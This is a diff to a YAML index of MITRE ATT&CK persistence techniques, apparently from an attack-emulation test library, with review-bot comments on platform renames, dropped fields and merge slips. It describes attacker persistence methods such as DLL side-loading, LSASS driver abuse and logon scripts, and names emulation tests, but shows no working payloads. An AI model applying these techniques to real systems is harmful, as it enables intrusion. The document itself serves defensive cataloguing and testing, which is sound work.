- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests:
- name: Install Outlook Home Page Persistence
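Review bot: `x_mitre_permissions_required` (Administrator, User) is removed from T1137.004 with no replacement field, while `x_mitre_platforms` changes from `Office 365` to `Office Suite` and `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0. Both are consistent with importing a newer ATT&CK release, but any consumer that filters or indexes on the platform name or on permissions will see T1137.004 move or disappear; verify that the generated per-platform index still lists it where intended.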
@@ -70561,7 +70966,7 @@ persistence:
'
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -70622,7 +71027,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests:
- name: Execution of program.exe as service with unquoted service path
@@ -70694,7 +71098,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -70716,7 +71120,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
@@ -70949,7 +71352,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -70972,7 +71374,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -71002,12 +71404,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
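Review bot: for T1037.003 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed, whereas the other objects in this patch keep `x_mitre_attack_spec_version` (usually bumped to 3.2.0). Check whether the source object genuinely lacks the field or whether it was dropped during conversion; the same pattern appears for T1037.001 later in the patch (`@@ -73206,8 +73586,6 @@`).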
@@ -71097,7 +71497,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
@@ -71227,7 +71626,7 @@ persistence:
name: command_prompt
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -71312,7 +71711,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
@@ -71436,7 +71834,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
@@ -71475,13 +71872,13 @@ persistence:
elevation_required: true
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -71514,10 +71911,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
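Review bot: T1556.009 loses both `Azure AD` and `SaaS` from `x_mitre_platforms` and gains only `Identity Provider`. Replacing `Azure AD` with `Identity Provider` matches the Entra ID rename in the description in the previous hunk, but dropping `SaaS` is a separate change; confirm it matches the upstream object at version '1.1' rather than a merge slip.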
@@ -71554,7 +71950,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -71628,7 +72023,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -71656,7 +72051,6 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests:
- name: Launch Agent
@@ -71777,7 +72171,7 @@ persistence:
sudo rm /tmp/T1543_001_atomicredteam.txt
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -71836,33 +72230,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -71883,6 +72254,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -71897,52 +72269,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
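Review bot: this hunk straddles the boundary between the T1556.001 and T1556.005 objects: the unchanged context lines `type: attack-pattern` and `created_by_ref: identity--c78cb6e5-...` were matched across two different objects, so the removed `id: attack-pattern--d50955c2-...` (T1556.005) and the added `id: attack-pattern--d4b96d2c-...` (T1556.001) sit side by side. When checking the result, confirm that T1556.001 ends up with id d4b96d2c.../created 2020-02-11 and that T1556.005 (re-added in the next hunk) ends up with id d50955c2.../created 2022-01-13; note also that `x_mitre_permissions_required: [Administrator]` is dropped from T1556.001 here.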
@@ -71964,6 +72326,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -71974,23 +72337,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -72007,7 +72397,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
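Review bot: the contributor entry changes from `Alexander Rodchenko` to `Rodchenko Aleksandr` (surname first, different transliteration), while a later hunk in this patch changes `Goldstein Menachem` to `Menachem Goldstein` (given name first). If both strings come verbatim from upstream they are fine, but the two renames pull in opposite directions, so confirm neither was hand-edited.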
@@ -72066,7 +72456,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -72148,7 +72537,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -72320,7 +72708,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
@@ -72479,7 +72866,7 @@ persistence:
systemctl daemon-reload
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -72502,16 +72889,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
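Review bot: T1136's platform list drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, keeping `SaaS`. Any per-platform index generated from `x_mitre_platforms` (for example a Google Workspace or Office 365 index) will no longer contain T1136 unless the generator maps the old platform names to the new ones; confirm that mapping exists or that the resulting index change is intended.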
@@ -72538,7 +72924,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -72607,7 +72992,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -72643,7 +73027,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -72662,7 +73046,6 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests:
- name: Copy in loginwindow.plist for Re-Opened Applications
@@ -72756,7 +73139,7 @@ persistence:
name: sh
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -72806,7 +73189,6 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -72925,7 +73307,7 @@ persistence:
elevation_required: true
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -72958,9 +73340,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
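Review bot: splitting `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two entries leaves the `(Gurucul)` affiliation on Dherange only. If Vijayaraghavan shares that affiliation it should be carried to both entries; otherwise the split is fine.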
@@ -72977,9 +73360,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -73025,7 +73407,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests:
- name: EXO - Full access mailbox permission granted to a user
@@ -73081,7 +73462,7 @@ persistence:
elevation_required: false
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -73095,7 +73476,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -73154,7 +73535,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -73180,7 +73560,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -73206,8 +73586,6 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
@@ -73237,7 +73615,7 @@ persistence:
name: command_prompt
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -73261,8 +73639,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -73292,7 +73670,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests:
- name: Office Application Startup Test Persistence (HKCU)
@@ -73377,7 +73754,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -73402,7 +73779,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests:
- name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
@@ -73446,7 +73822,7 @@ persistence:
elevation_required: true
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -73486,8 +73862,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
